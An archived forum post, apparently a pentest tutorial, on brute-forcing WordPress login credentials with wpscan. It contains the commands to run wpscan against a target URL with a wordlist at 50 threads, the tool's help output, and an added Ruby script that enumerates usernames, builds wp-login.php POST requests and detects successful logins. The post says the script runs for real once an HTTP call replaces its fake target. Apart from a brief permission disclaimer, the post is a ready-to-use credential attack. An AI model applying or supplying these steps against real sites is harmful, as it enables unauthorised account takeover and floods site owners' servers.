You are viewing our Forum Archives. To view or take place in current topics click here.
Pentest - How to hack your WordPress login using wpscan
Posted:

morgsboi
  • Powerhouse
Status: Offline
Joined: Jun 22, 2012 (11 Year Member)
Posts: 471
Reputation Power: 19
Using this to hack a website that you do not have permission to hack is illegal. Make sure you have permission from the owner. I am not responsible for how you use this tool.
This is a re-post of my topic on Hack Forums. I wrote it myself.
You need BackTrack for this tutorial: the /pentest/web/wpscan path used below is where BackTrack ships wpscan. Having the newest version always helps.
First, make sure you have wpscan installed. Here is my tutorial on how to do that: [ Register or Signin to view external links. ]

Please note that pasting text into the terminal does not always work, so you may need to type it manually.

Next, open up a new terminal window and type in:
cd /pentest/web/wpscan


Now you need a wordlist. [ Register or Signin to view external links. ] has some good password lists. Try to choose one that isn't too big: every password in it is tried against every username found, and each guess is a separate HTTP request to the target's login page, so a big list takes a long time to brute force.
When you have downloaded the file, extract it to a plain .txt file and put that file in /pentest/web/wpscan (the directory you changed into above), so the command below can name it without a path.

Next, type in the following (replace <target url> with the site's URL):
ruby wpscan.rb --url <target url> --wordlist yourwordlist.txt --threads 50

50 threads is aggressive: it will hammer the site, fill its web server logs and can trip login-lockout plugins or a web application firewall. Lower the thread count if the target is small or your engagement sets rate limits.

Press enter. It will probably stop at a [y/n] prompt.


Type "y" and press enter.

This will first check that the site is really running WordPress and find the login page, then enumerate usernames (by default user ids 1 to 10, as the -e u option below describes), and then start brute forcing each username it found. If you already know the account name, --username <username> (listed below) restricts the brute force to that one user and skips the rest.

All you have to do now is leave it to work through the wordlist for each user until it finds a username with a matching password. You can't predict how long it will take. The more passwords in the file, the more likely it is to find a match, but the longer the run takes: the number of requests is users multiplied by passwords. The percentage of passwords tested is displayed at the bottom, along with the username currently being attacked. Bear in mind that every one of those requests lands in the target's web server logs, and a login-lockout or rate-limiting plugin can block your IP partway through, so a run that finishes with no hit does not prove the password is not in your list.
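To show what wpscan is doing while that percentage counter ticks up, here is an added example in Ruby (wpscan's own language). It is not wpscan's code and not part of the original post. It implements the three pieces of the run above against constructed data, so it works offline: username enumeration from the /?author=N redirect WordPress issues, the wp-login.php POST body with its log and pwd fields, and the success check on the wordpress_logged_in_ cookie. The hostname target.example, the FAKE_ACCOUNTS stand-in for the target with its admin/letmein credential, the in-memory wordlist and the 10 requests per second figure are all assumptions made for the demonstration.

```ruby
# Added example: the mechanics of a WordPress login brute force such as the one
# wpscan runs, driven by a constructed stand-in for the target so it runs offline.
# This is not wpscan's code.
require 'uri'
require 'cgi'

# Step 1: username enumeration. WordPress answers /?author=N with a redirect to
# /author/<login-name>/ when user id N exists. Given the Location header of that
# redirect, pull the login name out of it; nil when it was not an author redirect.
def username_from_author_redirect(location)
  return nil if location.nil?
  m = location.match(%r{/author/([^/]+)/?(?:$|\?)})
  m && CGI.unescape(m[1])
end

# Step 2: the login request. wp-login.php expects a form POST with the fields
# 'log' (username) and 'pwd' (password); 'wp-submit' is what the browser form
# sends. Build the body exactly as a browser would, including URL encoding.
def wp_login_body(username, password)
  URI.encode_www_form('log' => username, 'pwd' => password, 'wp-submit' => 'Log In')
end

# Step 3: deciding whether a guess worked. A successful login sets the
# wordpress_logged_in_<hash> cookie and redirects to wp-admin/; a failed one
# re-renders the form (200) containing the login_error div. The cookie is the
# reliable signal: sites that redirect every request (to https, a maintenance
# page, ...) would fool a check on the status code alone.
# status: Integer, headers: Hash of lower-case name => Array of values, body: String
def login_succeeded?(status, headers, body)
  cookies = headers.fetch('set-cookie', [])
  return true if cookies.any? { |c| c.start_with?('wordpress_logged_in_') }
  return false if body.include?('login_error')
  status == 302 && headers.fetch('location', []).any? { |l| l.include?('wp-admin') }
end

# Step 4: wordlist handling. Drop blank lines and duplicates so no request is
# wasted; keep the file order, since wordlists are usually sorted by frequency
# and the common passwords should be tried first.
def load_wordlist(path)
  File.foreach(path, chomp: true).reject(&:empty?).uniq
end

# Step 5: what "too big" means. Each guess is one HTTP round trip, so
# users x passwords divided by the request rate the target actually sustains
# is the lower bound on run time, in seconds.
def estimated_seconds(usernames, passwords, requests_per_second)
  (usernames.size * passwords.size) / requests_per_second.to_f
end

# The brute-force loop itself, with the transport behind a block so it can be
# driven by a real HTTP client or, as below, by a stand-in. The block receives
# (username, post_body) and returns [status, headers, body]. Stops at the first
# hit per user; returns {username => password}.
def brute_force(usernames, passwords)
  found = {}
  usernames.each do |user|
    passwords.each do |pass|
      status, headers, body = yield(user, wp_login_body(user, pass))
      if login_succeeded?(status, headers, body)
        found[user] = pass
        break
      end
    end
  end
  found
end

# Constructed stand-in for the target (assumption: one valid account,
# 'admin' / 'letmein'). It parses the POST body like wp-login.php would and
# answers with the two response shapes described in Step 3.
FAKE_ACCOUNTS = { 'admin' => 'letmein' }.freeze

def fake_wp_login(_user, body)
  form = URI.decode_www_form(body).to_h
  if FAKE_ACCOUNTS[form['log']] == form['pwd']
    [302, { 'set-cookie' => ['wordpress_logged_in_abc=admin%7C1; path=/'],
            'location' => ['http://target.example/wp-admin/'] }, '']
  else
    [200, {}, '<div id="login_error"><strong>ERROR</strong>: Incorrect password.</div>']
  end
end

if __FILE__ == $0
  require 'tempfile'
  wl = Tempfile.new('wordlist')          # constructed wordlist, with a blank and a duplicate
  wl.write("123456\npassword\n\nletmein\n123456\n")
  wl.flush
  users = ['admin', 'editor']            # as if enumerated from /?author=1 and /?author=2
  passwords = load_wordlist(wl.path)
  puts "#{users.size} users x #{passwords.size} passwords, ~#{estimated_seconds(users, passwords, 10)}s at 10 req/s"
  p brute_force(users, passwords) { |u, body| fake_wp_login(u, body) }
end
```

Swap the fake_wp_login block for a Net::HTTP call that POSTs the body to /wp-login.php and returns [status, headers, body], and the same loop runs for real; the cookie check is what keeps the result honest on sites that answer every request with a redirect.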

Here are the other options wpscan accepts (this is its help output):
--update                        Update to the latest revision.
--url | -u <target url>         The WordPress URL/domain to scan.
--force | -f                    Force WPScan not to check whether the remote site is running WordPress.
--enumerate | -e [option(s)]    Enumeration. Options:
    u         usernames from id 1 to 10
    u[10-20]  usernames from id 10 to 20 (the [] characters are required)
    p         plugins
    p!        only vulnerable plugins
    t         timthumbs
  Multiple values are allowed: '-e tp' will enumerate timthumbs and plugins.
  If no option is supplied, the default is 'tup!'.

--follow-redirection            If the target URL redirects, follow it without asking first.
--wp-content-dir <dir>          WPScan tries to find the content directory (i.e. wp-content) by scanning the index page, but you can specify it here. Subdirectories are allowed.
--wp-plugins-dir <dir>          Same as --wp-content-dir but for the plugins directory. If not supplied, WPScan uses <wp-content-dir>/plugins. Subdirectories are allowed.
--proxy <host:port>             Use a proxy (overrides the one in conf/browser.conf.json).
--wordlist | -w <wordlist>      Supply a wordlist for the password bruter and run the brute force.
--threads | -t <number>         Number of threads to use for multi-threaded requests (overrides the value in conf/browser.conf.json).
--username | -U <username>      Only brute force the supplied username.
--help | -h                     This help screen.
--verbose | -v                  Verbose output.

If you have any questions, please post them below. Hope I helped.